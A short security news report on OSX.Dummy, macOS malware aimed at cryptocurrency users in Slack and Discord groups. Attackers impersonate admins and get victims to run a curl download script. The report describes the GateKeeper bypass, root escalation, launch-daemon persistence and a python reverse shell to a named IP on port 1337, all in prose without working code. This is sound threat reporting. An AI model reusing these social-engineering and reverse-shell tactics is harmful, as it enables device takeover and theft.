Several MacOs malware attacks have been identified in the past few days with victims targeted via the Slack and Discord chat platforms. The attackers are targeting cryptocurrency investors and are posting messages on Slack and Discord groups linked to cryptocurrencies.
This is an impersonation attack in which admins and key personnel are being impersonated, with users advised to run a script that downloads a malware variant named OSX.Dummy malware via curl.
The malware has a 34Mb size, which should be a warning sign, although it is currently not being picked up by any AV products on VirusTotal, according to security researcher Remco Verhoef, who recently posted about the attacks on the SANS ISC InfoSec forum.
Patrick Wardle, chief research officer at Digita Security, also wrote about the attack in a recent blog post. Wardle notes that usually, an unsigned binary would not be allowed to run by GateKeeper, although if the binary is being run directly through terminal controls the file will be allowed to execute as GateKeeper is not involved.
Once the binary is run, the permissions for the malware are changed to root, which would require a user to enter a password in the terminal. Should that happen, the malware drops code to achieve persistence.
Verhoef explained in his post, “The bash script (which runs a python command) tries to connect to 126.96.36.199 at port 1337 within a loop and the python code creates a reverse shell. To ensure execution during startup it creates a launch daemon.” Should the attack be successful, it would allow the attacker to take full control of an infected device. However, in the version examined by Verhoef, the malware was unable to connect to its C2.